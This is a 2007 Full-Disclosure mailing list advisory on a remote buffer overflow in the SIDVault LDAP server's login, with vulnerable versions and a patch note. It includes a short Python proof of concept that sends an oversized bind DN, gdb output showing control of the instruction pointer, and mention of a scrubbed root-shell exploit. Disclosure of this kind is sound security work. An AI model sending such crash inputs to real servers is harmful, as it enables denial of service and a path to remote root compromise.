[Full-disclosure] SIDVault LDAP Server Remote Buffer Overflow

Joxean Koret joxeankoret at yahoo.es
Sun Aug 26 01:50:11 BST 2007 

SIDVault LDAP Server Remote Buffer Overflow
===========================================

Product Description:

SIDVault LDAP Server for Win32 and GNU/Linux

SIDVault is a Simple Integration Database, allowing easy management and
installations with high performance LDAP v3 server. It supports any
number of schemas, easy to add/modify existing schemas, integrated web
based user access, and fast browser based administration tools. Supports
all relevant RFC protocols LDAP v2, LDAP v3, HTTP, ILS. 

Vulnerable versions:

	Win32 2.0e
	Linux 2.0d

Vulnerability Details:

The login mechanism is prone to multiple buffer-overflow vulnerabilities
because it fails to adequately bounds-check user-supplied input before
copying it to an insufficiently sized buffer.

Successfully exploiting the issue will allow an attacker to execute
arbitrary code with root or SYSTEM-level privileges depending on the
operative system target. Failed exploit attempts will result in a
denial-of-service condition. 

Proof of concept:

# gdb /usr/local/sidvault/sidvault
(...)
(gdb) r -run

In another terminal:

$ cat poc.py
import ldap

l = ldap.open("localhost")
l.simple_bind("dc=" + "A"*4099, "B"*256)
$ ./poc.py

In the first terminal:

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1226736720 (LWP 5942)]
0x41414141 in ?? ()
(gdb) where
#0  0x41414141 in ?? ()
#1  0x41414141 in ?? ()
(...)
Quit
(gdb) i r
eax            0x8202c48        136326216
ecx            0x0      0
edx            0xb6e164df       -1226742561
ebx            0x41414141       1094795585
esp            0xb6e16500       0xb6e16500
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141

Exploit:

An exploit for Debian based distributions which spawns a remote root
terminal has been writen. See the attached exploit.

Patch information:

The problem is solved in the latest version (2.0f) which is available in
the vendor's website at http://www.alphacentauri.co.nz/.

Thanks:

Thanks to Lynden Sherriff from Alphacentauri Ltd., he where very kind
and professional.

Disclaimer:

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind. 

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.

Contact:

Joxean Koret - joxeankoret[at]yahoo[dot]es

-------------- next part --------------
A non-text attachment was scrubbed...
Name: exploit.py
Type: text/x-python
Size: 1723 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070826/b3f374a5/attachment.py 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 191 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070826/b3f374a5/attachment.bin

Full-Disclosure is hosted and sponsored by Secunia.